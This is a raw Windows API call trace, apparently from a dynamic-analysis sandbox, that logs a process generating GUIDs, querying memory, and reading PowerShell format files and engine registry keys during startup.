	[0286.526] CoCreateGuid (in: pguid=0x20cfb0 | out: pguid=0x20cfb0*(Data1=0xb88c46be, Data2=0x9ac, Data3=0x4723, Data4=([0]=0xb7, [1]=0xfa, [2]=0x30, [3]=0xc8, [4]=0xcc, [5]=0x91, [6]=0xf2, [7]=0x1a))) returned 0x0
	[0286.527] CoCreateGuid (in: pguid=0x20cfb0 | out: pguid=0x20cfb0*(Data1=0x7f50224f, Data2=0xce77, Data3=0x47c8, Data4=([0]=0x90, [1]=0x14, [2]=0x5c, [3]=0x8b, [4]=0xf8, [5]=0xbe, [6]=0x44, [7]=0x26))) returned 0x0
	[0286.527] CoCreateGuid (in: pguid=0x20cfb0 | out: pguid=0x20cfb0*(Data1=0x77f79e2b, Data2=0x3592, Data3=0x4450, Data4=([0]=0xac, [1]=0x9e, [2]=0x7c, [3]=0x1b, [4]=0xf5, [5]=0xd6, [6]=0x34, [7]=0x9b))) returned 0x0
	[0286.527] CoCreateGuid (in: pguid=0x20cfb0 | out: pguid=0x20cfb0*(Data1=0xfeb0da61, Data2=0xd0a3, Data3=0x4f36, Data4=([0]=0x83, [1]=0x21, [2]=0x25, [3]=0xa1, [4]=0x8e, [5]=0xcf, [6]=0x6f, [7]=0x6c))) returned 0x0
	[0286.527] CoCreateGuid (in: pguid=0x20cfb0 | out: pguid=0x20cfb0*(Data1=0xd49e5863, Data2=0x4bc0, Data3=0x40c1, Data4=([0]=0x99, [1]=0x7a, [2]=0x18, [3]=0x59, [4]=0x12, [5]=0xe9, [6]=0xbd, [7]=0xaa))) returned 0x0
	[0286.527] CoCreateGuid (in: pguid=0x20cfb0 | out: pguid=0x20cfb0*(Data1=0x59007eb1, Data2=0x5d93, Data3=0x427f, Data4=([0]=0x9d, [1]=0xf3, [2]=0x5a, [3]=0x24, [4]=0xf7, [5]=0xa, [6]=0xed, [7]=0xe4))) returned 0x0
	[0286.527] CoCreateGuid (in: pguid=0x20cfb0 | out: pguid=0x20cfb0*(Data1=0x74bf84bf, Data2=0x95f3, Data3=0x42d6, Data4=([0]=0xb4, [1]=0xfa, [2]=0x47, [3]=0xbd, [4]=0x22, [5]=0xf9, [6]=0x44, [7]=0x89))) returned 0x0
	[0286.527] CoCreateGuid (in: pguid=0x20cfb0 | out: pguid=0x20cfb0*(Data1=0x9204e088, Data2=0xbbf6, Data3=0x40f2, Data4=([0]=0xa1, [1]=0x89, [2]=0xf2, [3]=0x98, [4]=0x5d, [5]=0x7, [6]=0x52, [7]=0xec))) returned 0x0
	[0286.528] CoCreateGuid (in: pguid=0x20cfb0 | out: pguid=0x20cfb0*(Data1=0x57181c50, Data2=0x3d3b, Data3=0x4ef2, Data4=([0]=0xad, [1]=0x41, [2]=0xec, [3]=0x32, [4]=0x2f, [5]=0xe7, [6]=0xfd, [7]=0xd8))) returned 0x0
	[0286.528] CoCreateGuid (in: pguid=0x20cfb0 | out: pguid=0x20cfb0*(Data1=0x68872124, Data2=0x1922, Data3=0x495b, Data4=([0]=0xa3, [1]=0xc7, [2]=0x41, [3]=0x26, [4]=0x54, [5]=0xc5, [6]=0x9b, [7]=0x68))) returned 0x0
	[0286.528] VirtualQuery (in: lpAddress=0x20b960, lpBuffer=0x20c820, dwLength=0x30 | out: lpBuffer=0x20c820*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.528] VirtualQuery (in: lpAddress=0x20b960, lpBuffer=0x20c820, dwLength=0x30 | out: lpBuffer=0x20c820*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.528] VirtualQuery (in: lpAddress=0x20b960, lpBuffer=0x20c820, dwLength=0x30 | out: lpBuffer=0x20c820*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.528] CoCreateGuid (in: pguid=0x20cfb0 | out: pguid=0x20cfb0*(Data1=0x68ece0f8, Data2=0x15ba, Data3=0x4265, Data4=([0]=0xba, [1]=0x34, [2]=0xda, [3]=0x9, [4]=0xc8, [5]=0xf2, [6]=0x9e, [7]=0x8a))) returned 0x0
	[0286.529] CoCreateGuid (in: pguid=0x20cfb0 | out: pguid=0x20cfb0*(Data1=0x1171902, Data2=0x2c1d, Data3=0x4e0c, Data4=([0]=0xb1, [1]=0x9, [2]=0xb3, [3]=0xdf, [4]=0x3a, [5]=0xdb, [6]=0x61, [7]=0x50))) returned 0x0
	[0286.529] CoCreateGuid (in: pguid=0x20cfb0 | out: pguid=0x20cfb0*(Data1=0x214f26a7, Data2=0x78c0, Data3=0x40a8, Data4=([0]=0xb9, [1]=0x56, [2]=0xda, [3]=0x79, [4]=0x57, [5]=0x72, [6]=0x16, [7]=0xb3))) returned 0x0
	[0286.529] CoCreateGuid (in: pguid=0x20cfb0 | out: pguid=0x20cfb0*(Data1=0x782b6576, Data2=0x31b1, Data3=0x4a6d, Data4=([0]=0x9a, [1]=0xf3, [2]=0x58, [3]=0xcf, [4]=0x67, [5]=0x5e, [6]=0x79, [7]=0x4f))) returned 0x0
	[0286.529] CoCreateGuid (in: pguid=0x20cfb0 | out: pguid=0x20cfb0*(Data1=0x8fac7794, Data2=0x3b43, Data3=0x41a9, Data4=([0]=0xb8, [1]=0x14, [2]=0x36, [3]=0x9e, [4]=0xe1, [5]=0x5a, [6]=0x62, [7]=0x4b))) returned 0x0
	[0286.529] CoCreateGuid (in: pguid=0x20cfb0 | out: pguid=0x20cfb0*(Data1=0x4604315, Data2=0xb19c, Data3=0x4add, Data4=([0]=0xaa, [1]=0x9e, [2]=0xda, [3]=0x67, [4]=0x17, [5]=0x32, [6]=0xa9, [7]=0xb8))) returned 0x0
	[0286.529] CoCreateGuid (in: pguid=0x20cfb0 | out: pguid=0x20cfb0*(Data1=0x4df97869, Data2=0x4693, Data3=0x4dfc, Data4=([0]=0xb7, [1]=0x6f, [2]=0xf2, [3]=0x85, [4]=0x11, [5]=0x29, [6]=0x37, [7]=0xf7))) returned 0x0
	[0286.529] CoCreateGuid (in: pguid=0x20cfb0 | out: pguid=0x20cfb0*(Data1=0x38697df5, Data2=0x6f3b, Data3=0x4c3a, Data4=([0]=0x9b, [1]=0x30, [2]=0xe7, [3]=0x0, [4]=0xdd, [5]=0x4d, [6]=0x88, [7]=0xc0))) returned 0x0
	[0286.530] CoCreateGuid (in: pguid=0x20cfb0 | out: pguid=0x20cfb0*(Data1=0x3ceb5dcf, Data2=0x4ee3, Data3=0x418a, Data4=([0]=0x80, [1]=0x24, [2]=0x17, [3]=0x12, [4]=0xa, [5]=0x0, [6]=0xb2, [7]=0x24))) returned 0x0
	[0286.530] CoCreateGuid (in: pguid=0x20cfb0 | out: pguid=0x20cfb0*(Data1=0xcefb8027, Data2=0xdbf2, Data3=0x4740, Data4=([0]=0xa9, [1]=0x6e, [2]=0x22, [3]=0xc8, [4]=0xde, [5]=0xa8, [6]=0x37, [7]=0xdc))) returned 0x0
	[0286.530] CoCreateGuid (in: pguid=0x20cfb0 | out: pguid=0x20cfb0*(Data1=0xec8cdd7b, Data2=0xff8e, Data3=0x41d3, Data4=([0]=0x9f, [1]=0xf9, [2]=0x25, [3]=0xe7, [4]=0xb9, [5]=0x40, [6]=0x4e, [7]=0x9d))) returned 0x0
	[0286.530] CoCreateGuid (in: pguid=0x20cfb0 | out: pguid=0x20cfb0*(Data1=0x8a30e64f, Data2=0x5e11, Data3=0x41b9, Data4=([0]=0x8f, [1]=0x94, [2]=0xaa, [3]=0xb4, [4]=0xe8, [5]=0x4c, [6]=0x3f, [7]=0x51))) returned 0x0
	[0286.530] CoCreateGuid (in: pguid=0x20cfb0 | out: pguid=0x20cfb0*(Data1=0x51fe04b0, Data2=0x4eef, Data3=0x4719, Data4=([0]=0xa6, [1]=0xe7, [2]=0xc3, [3]=0xee, [4]=0x28, [5]=0x7b, [6]=0xc4, [7]=0x92))) returned 0x0
	[0286.530] VirtualQuery (in: lpAddress=0x20b960, lpBuffer=0x20c820, dwLength=0x30 | out: lpBuffer=0x20c820*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.530] CoCreateGuid (in: pguid=0x20cfb0 | out: pguid=0x20cfb0*(Data1=0x59f1659b, Data2=0x2f1c, Data3=0x4e63, Data4=([0]=0x9c, [1]=0xf7, [2]=0x6d, [3]=0x88, [4]=0x63, [5]=0xc2, [6]=0x70, [7]=0xa3))) returned 0x0
	[0286.530] VirtualQuery (in: lpAddress=0x20b960, lpBuffer=0x20c820, dwLength=0x30 | out: lpBuffer=0x20c820*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.531] VirtualQuery (in: lpAddress=0x20b960, lpBuffer=0x20c820, dwLength=0x30 | out: lpBuffer=0x20c820*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.532] CoCreateGuid (in: pguid=0x20cfb0 | out: pguid=0x20cfb0*(Data1=0x4adb0fdc, Data2=0xe24e, Data3=0x4e50, Data4=([0]=0xb3, [1]=0x21, [2]=0x9a, [3]=0x7, [4]=0x4, [5]=0x1f, [6]=0x32, [7]=0xcd))) returned 0x0
	[0286.532] VirtualQuery (in: lpAddress=0x20b960, lpBuffer=0x20c820, dwLength=0x30 | out: lpBuffer=0x20c820*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.532] CoCreateGuid (in: pguid=0x20cfb0 | out: pguid=0x20cfb0*(Data1=0x3def33d0, Data2=0x1518, Data3=0x4e01, Data4=([0]=0x9a, [1]=0x7e, [2]=0xe3, [3]=0xc5, [4]=0x15, [5]=0x7e, [6]=0x86, [7]=0xe7))) returned 0x0
	[0286.532] CoCreateGuid (in: pguid=0x20cfb0 | out: pguid=0x20cfb0*(Data1=0xd5539833, Data2=0x25a2, Data3=0x4600, Data4=([0]=0xb6, [1]=0xfd, [2]=0x69, [3]=0xaf, [4]=0x14, [5]=0xe0, [6]=0x9d, [7]=0x84))) returned 0x0
	[0286.532] CoCreateGuid (in: pguid=0x20cfb0 | out: pguid=0x20cfb0*(Data1=0x84fd8380, Data2=0x11c5, Data3=0x4a00, Data4=([0]=0xbf, [1]=0x86, [2]=0x20, [3]=0x1c, [4]=0x75, [5]=0x4a, [6]=0x51, [7]=0xc3))) returned 0x0
	[0286.533] CoCreateGuid (in: pguid=0x20cfb0 | out: pguid=0x20cfb0*(Data1=0xd956aa94, Data2=0x8479, Data3=0x436c, Data4=([0]=0x89, [1]=0xc1, [2]=0x4a, [3]=0x3b, [4]=0xec, [5]=0xe8, [6]=0x25, [7]=0xb8))) returned 0x0
	[0286.533] CoCreateGuid (in: pguid=0x20cfb0 | out: pguid=0x20cfb0*(Data1=0x783bf1f7, Data2=0xedc8, Data3=0x45c0, Data4=([0]=0xa7, [1]=0x8e, [2]=0xd0, [3]=0xc2, [4]=0x7a, [5]=0xc8, [6]=0xf, [7]=0x6))) returned 0x0
	[0286.533] CoCreateGuid (in: pguid=0x20cfb0 | out: pguid=0x20cfb0*(Data1=0x249a7f28, Data2=0x3fa2, Data3=0x4d65, Data4=([0]=0xb6, [1]=0x36, [2]=0xb2, [3]=0x6a, [4]=0x7c, [5]=0x12, [6]=0xf7, [7]=0xbb))) returned 0x0
	[0286.533] CoCreateGuid (in: pguid=0x20cfb0 | out: pguid=0x20cfb0*(Data1=0xfb54fd79, Data2=0xb4b5, Data3=0x4a4f, Data4=([0]=0x92, [1]=0x2f, [2]=0xee, [3]=0xb8, [4]=0x53, [5]=0x4a, [6]=0x69, [7]=0xd))) returned 0x0
	[0286.533] VirtualQuery (in: lpAddress=0x20b960, lpBuffer=0x20c820, dwLength=0x30 | out: lpBuffer=0x20c820*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.533] CoCreateGuid (in: pguid=0x20cfb0 | out: pguid=0x20cfb0*(Data1=0x747986dc, Data2=0x84ee, Data3=0x401d, Data4=([0]=0xa8, [1]=0xb0, [2]=0x4e, [3]=0x55, [4]=0x3e, [5]=0x98, [6]=0x19, [7]=0x79))) returned 0x0
	[0286.533] CoCreateGuid (in: pguid=0x20cfb0 | out: pguid=0x20cfb0*(Data1=0xf5ee5630, Data2=0x8bda, Data3=0x471d, Data4=([0]=0x8f, [1]=0x7f, [2]=0x60, [3]=0x25, [4]=0x2a, [5]=0x1a, [6]=0x0, [7]=0x16))) returned 0x0
	[0286.534] CoCreateGuid (in: pguid=0x20cfb0 | out: pguid=0x20cfb0*(Data1=0xf0038ec9, Data2=0xb7e, Data3=0x4524, Data4=([0]=0x97, [1]=0xab, [2]=0x57, [3]=0x80, [4]=0x5, [5]=0xdf, [6]=0xc9, [7]=0xbb))) returned 0x0
	[0286.534] CoCreateGuid (in: pguid=0x20cfb0 | out: pguid=0x20cfb0*(Data1=0xbffccd2d, Data2=0x4806, Data3=0x4289, Data4=([0]=0x8e, [1]=0x5f, [2]=0xea, [3]=0xb1, [4]=0xda, [5]=0x53, [6]=0xd5, [7]=0xb5))) returned 0x0
	[0286.534] CoCreateGuid (in: pguid=0x20cfb0 | out: pguid=0x20cfb0*(Data1=0x98c79045, Data2=0x36f4, Data3=0x4133, Data4=([0]=0x8b, [1]=0x23, [2]=0xee, [3]=0x13, [4]=0xe9, [5]=0x15, [6]=0x6c, [7]=0x30))) returned 0x0
	[0286.534] VirtualQuery (in: lpAddress=0x20b960, lpBuffer=0x20c820, dwLength=0x30 | out: lpBuffer=0x20c820*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.534] CoCreateGuid (in: pguid=0x20cfb0 | out: pguid=0x20cfb0*(Data1=0x2f4b1d5f, Data2=0xd0cd, Data3=0x4725, Data4=([0]=0x8e, [1]=0x6d, [2]=0xf8, [3]=0xfa, [4]=0xdf, [5]=0x5d, [6]=0xb, [7]=0xd6))) returned 0x0
	[0286.534] CoCreateGuid (in: pguid=0x20cfb0 | out: pguid=0x20cfb0*(Data1=0xdc9e6d55, Data2=0x5fee, Data3=0x4ccd, Data4=([0]=0xb7, [1]=0x18, [2]=0xfc, [3]=0x8, [4]=0xa7, [5]=0x78, [6]=0x59, [7]=0x11))) returned 0x0
	[0286.534] VirtualQuery (in: lpAddress=0x20b9d0, lpBuffer=0x20c890, dwLength=0x30 | out: lpBuffer=0x20c890*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.535] VirtualQuery (in: lpAddress=0x20b9d0, lpBuffer=0x20c890, dwLength=0x30 | out: lpBuffer=0x20c890*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.535] VirtualQuery (in: lpAddress=0x20b9d0, lpBuffer=0x20c890, dwLength=0x30 | out: lpBuffer=0x20c890*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.535] VirtualQuery (in: lpAddress=0x20b9d0, lpBuffer=0x20c890, dwLength=0x30 | out: lpBuffer=0x20c890*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.535] SetErrorMode (uMode=0x1) returned 0x1
	[0286.535] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x1c4
	[0286.535] GetFileType (hFile=0x1c4) returned 0x1
	[0286.535] SetErrorMode (uMode=0x1) returned 0x1
	[0286.535] GetFileType (hFile=0x1c4) returned 0x1
	[0286.535] ReadFile (in: hFile=0x1c4, lpBuffer=0x3108ac8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20ccf8, lpOverlapped=0x0 | out: lpBuffer=0x3108ac8*, lpNumberOfBytesRead=0x20ccf8*=0x1000, lpOverlapped=0x0) returned 1
	[0286.536] ReadFile (in: hFile=0x1c4, lpBuffer=0x3108ac8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20ccf8, lpOverlapped=0x0 | out: lpBuffer=0x3108ac8*, lpNumberOfBytesRead=0x20ccf8*=0x1000, lpOverlapped=0x0) returned 1
	[0286.536] ReadFile (in: hFile=0x1c4, lpBuffer=0x3108ac8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20ccf8, lpOverlapped=0x0 | out: lpBuffer=0x3108ac8*, lpNumberOfBytesRead=0x20ccf8*=0x1000, lpOverlapped=0x0) returned 1
	[0286.536] ReadFile (in: hFile=0x1c4, lpBuffer=0x3108ac8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20ccf8, lpOverlapped=0x0 | out: lpBuffer=0x3108ac8*, lpNumberOfBytesRead=0x20ccf8*=0x1000, lpOverlapped=0x0) returned 1
	[0286.537] ReadFile (in: hFile=0x1c4, lpBuffer=0x3108ac8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20ccf8, lpOverlapped=0x0 | out: lpBuffer=0x3108ac8*, lpNumberOfBytesRead=0x20ccf8*=0x8b4, lpOverlapped=0x0) returned 1
	[0286.537] ReadFile (in: hFile=0x1c4, lpBuffer=0x3107ee4, nNumberOfBytesToRead=0x34c, lpNumberOfBytesRead=0x20ccf8, lpOverlapped=0x0 | out: lpBuffer=0x3107ee4*, lpNumberOfBytesRead=0x20ccf8*=0x0, lpOverlapped=0x0) returned 1
	[0286.537] ReadFile (in: hFile=0x1c4, lpBuffer=0x3108ac8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20ccf8, lpOverlapped=0x0 | out: lpBuffer=0x3108ac8*, lpNumberOfBytesRead=0x20ccf8*=0x0, lpOverlapped=0x0) returned 1
	[0286.537] SetErrorMode (uMode=0x1) returned 0x1
	[0286.537] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x20cca0 | out: lpFileInformation=0x20cca0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x48b4)) returned 1
	[0286.537] SetErrorMode (uMode=0x1) returned 0x1
	[0286.537] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x20c9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0286.537] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x20cd88 | out: phkResult=0x20cd88*=0x1c4) returned 0x0
	[0286.537] RegQueryValueExW (in: hKey=0x1c4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x20cd0c, lpData=0x0, lpcbData=0x20cd08*=0x0 | out: lpType=0x20cd0c*=0x1, lpData=0x0, lpcbData=0x20cd08*=0x56) returned 0x0
	[0286.537] CoTaskMemAlloc (cb=0x5a) returned 0x4b1970
	[0286.537] RegQueryValueExW (in: hKey=0x1c4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x20ccdc, lpData=0x4b1970, lpcbData=0x20ccd8*=0x56 | out: lpType=0x20ccdc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x20ccd8*=0x56) returned 0x0
	[0286.538] CoTaskMemFree (pv=0x4b1970) 
	[0286.538] RegCloseKey (hKey=0x1c4) returned 0x0
	[0286.538] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x20c9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0286.538] CoCreateGuid (in: pguid=0x20cfb0 | out: pguid=0x20cfb0*(Data1=0x276d383e, Data2=0xe66f, Data3=0x440b, Data4=([0]=0xbd, [1]=0x80, [2]=0x8, [3]=0x3b, [4]=0x9b, [5]=0x93, [6]=0xb3, [7]=0x62))) returned 0x0
	[0286.538] CoCreateGuid (in: pguid=0x20cfb0 | out: pguid=0x20cfb0*(Data1=0x25a19e5b, Data2=0xa671, Data3=0x4561, Data4=([0]=0xbe, [1]=0x5e, [2]=0x4b, [3]=0x5e, [4]=0xb9, [5]=0x2b, [6]=0x84, [7]=0x5b))) returned 0x0
	[0286.538] SetErrorMode (uMode=0x1) returned 0x1
	[0286.539] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x1c4
	[0286.539] GetFileType (hFile=0x1c4) returned 0x1
	[0286.539] SetErrorMode (uMode=0x1) returned 0x1
	[0286.539] GetFileType (hFile=0x1c4) returned 0x1
	[0286.539] ReadFile (in: hFile=0x1c4, lpBuffer=0x31468b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20ccf8, lpOverlapped=0x0 | out: lpBuffer=0x31468b0*, lpNumberOfBytesRead=0x20ccf8*=0x1000, lpOverlapped=0x0) returned 1
	[0286.540] ReadFile (in: hFile=0x1c4, lpBuffer=0x31468b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20ccf8, lpOverlapped=0x0 | out: lpBuffer=0x31468b0*, lpNumberOfBytesRead=0x20ccf8*=0x1000, lpOverlapped=0x0) returned 1
	[0286.540] ReadFile (in: hFile=0x1c4, lpBuffer=0x31468b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20ccf8, lpOverlapped=0x0 | out: lpBuffer=0x31468b0*, lpNumberOfBytesRead=0x20ccf8*=0x1000, lpOverlapped=0x0) returned 1
	[0286.540] ReadFile (in: hFile=0x1c4, lpBuffer=0x31468b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20ccf8, lpOverlapped=0x0 | out: lpBuffer=0x31468b0*, lpNumberOfBytesRead=0x20ccf8*=0x1000, lpOverlapped=0x0) returned 1
	[0286.540] ReadFile (in: hFile=0x1c4, lpBuffer=0x31468b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20ccf8, lpOverlapped=0x0 | out: lpBuffer=0x31468b0*, lpNumberOfBytesRead=0x20ccf8*=0xe98, lpOverlapped=0x0) returned 1
	[0286.540] ReadFile (in: hFile=0x1c4, lpBuffer=0x3145eb0, nNumberOfBytesToRead=0x168, lpNumberOfBytesRead=0x20ccf8, lpOverlapped=0x0 | out: lpBuffer=0x3145eb0*, lpNumberOfBytesRead=0x20ccf8*=0x0, lpOverlapped=0x0) returned 1
	[0286.540] ReadFile (in: hFile=0x1c4, lpBuffer=0x31468b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20ccf8, lpOverlapped=0x0 | out: lpBuffer=0x31468b0*, lpNumberOfBytesRead=0x20ccf8*=0x0, lpOverlapped=0x0) returned 1
	[0286.540] SetErrorMode (uMode=0x1) returned 0x1
	[0286.540] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x20cca0 | out: lpFileInformation=0x20cca0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe603f2b9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x4e98)) returned 1
	[0286.541] SetErrorMode (uMode=0x1) returned 0x1
	[0286.541] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x20c9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0286.541] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x20cd88 | out: phkResult=0x20cd88*=0x1c4) returned 0x0
	[0286.541] RegQueryValueExW (in: hKey=0x1c4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x20cd0c, lpData=0x0, lpcbData=0x20cd08*=0x0 | out: lpType=0x20cd0c*=0x1, lpData=0x0, lpcbData=0x20cd08*=0x56) returned 0x0
	[0286.541] CoTaskMemAlloc (cb=0x5a) returned 0x4b1970
	[0286.541] RegQueryValueExW (in: hKey=0x1c4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x20ccdc, lpData=0x4b1970, lpcbData=0x20ccd8*=0x56 | out: lpType=0x20ccdc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x20ccd8*=0x56) returned 0x0
	[0286.541] CoTaskMemFree (pv=0x4b1970) 
	[0286.541] RegCloseKey (hKey=0x1c4) returned 0x0
	[0286.541] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x20c9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0286.542] VirtualQuery (in: lpAddress=0x20b820, lpBuffer=0x20c6e0, dwLength=0x30 | out: lpBuffer=0x20c6e0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.542] CoCreateGuid (in: pguid=0x20cfb0 | out: pguid=0x20cfb0*(Data1=0x881f3629, Data2=0xb159, Data3=0x4fa5, Data4=([0]=0xb6, [1]=0xc1, [2]=0xbc, [3]=0x5b, [4]=0x82, [5]=0x9, [6]=0xda, [7]=0x24))) returned 0x0
	[0286.542] CoCreateGuid (in: pguid=0x20cfb0 | out: pguid=0x20cfb0*(Data1=0x2e8c0244, Data2=0x5d92, Data3=0x4646, Data4=([0]=0x94, [1]=0x71, [2]=0xbf, [3]=0xf4, [4]=0x84, [5]=0x41, [6]=0xa6, [7]=0xca))) returned 0x0
	[0287.280] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x20cd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
